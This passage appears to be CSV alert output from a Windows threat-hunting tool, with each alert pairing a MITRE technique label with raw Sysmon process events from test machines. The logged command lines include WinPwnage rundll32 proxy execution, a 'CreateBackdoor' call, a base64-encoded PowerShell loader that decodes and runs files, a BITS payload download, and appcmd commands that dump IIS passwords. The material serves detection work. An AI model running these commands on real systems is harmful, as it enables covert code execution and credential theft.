<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:17.997235Z"">
</TimeCreated>
<EventRecordID>243516</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.518</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-00109B6C1E00</Data>
<Data Name=""ProcessId"">6620</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
</TimeCreated>
<EventRecordID>16443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
<Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:58:54.897009Z"">
</TimeCreated>
<EventRecordID>16443</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:58:54.772</Data>
<Data Name=""ProcessGuid"">365ABB72-269E-5CD8-0000-001084F81A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-268F-5CD8-0000-0010F4A51700</Data>
<Data Name=""ParentProcessId"">1256</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:28:22.598305Z"">
</TimeCreated>
<EventRecordID>16040</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2008"" ThreadID=""1992"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:28:22.488</Data>
<Data Name=""ProcessGuid"">365ABB72-0636-5CD7-0000-0010A6C72100</Data>
<Data Name=""ProcessId"">544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-F9CD-5CD6-0000-00201B370100</Data>
<Data Name=""LogonId"">0x1371b</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0545-5CD7-0000-001078371F00</Data>
<Data Name=""ParentProcessId"">3044</Data>
<Data Name=""ParentImage"">C:\Windows\System32\dllhost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:userName ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.435250Z"">
</TimeCreated>
<EventRecordID>5988</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.375</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-001032EAFF00</Data>
<Data Name=""ProcessId"">1004</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir &quot;. )&quot; /text:userName</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAd
ABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.254713Z"">
</TimeCreated>
<EventRecordID>4893</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.238</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ProcessId"">2948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:03.254713Z"">
</TimeCreated>
<EventRecordID>4893</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:03.238</Data>
<Data Name=""ProcessGuid"">747F3D96-660F-5D3F-0000-001055378600</Data>
<Data Name=""ProcessId"">2948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c powershell -c &quot;Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:20.305063Z"">
</TimeCreated>
<EventRecordID>5985</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:20.265</Data>
<Data Name=""ProcessGuid"">365ABB72-3D70-5CEB-0000-001072E6FF00</Data>
<Data Name=""ProcessId"">2640</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list vdir /text:password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
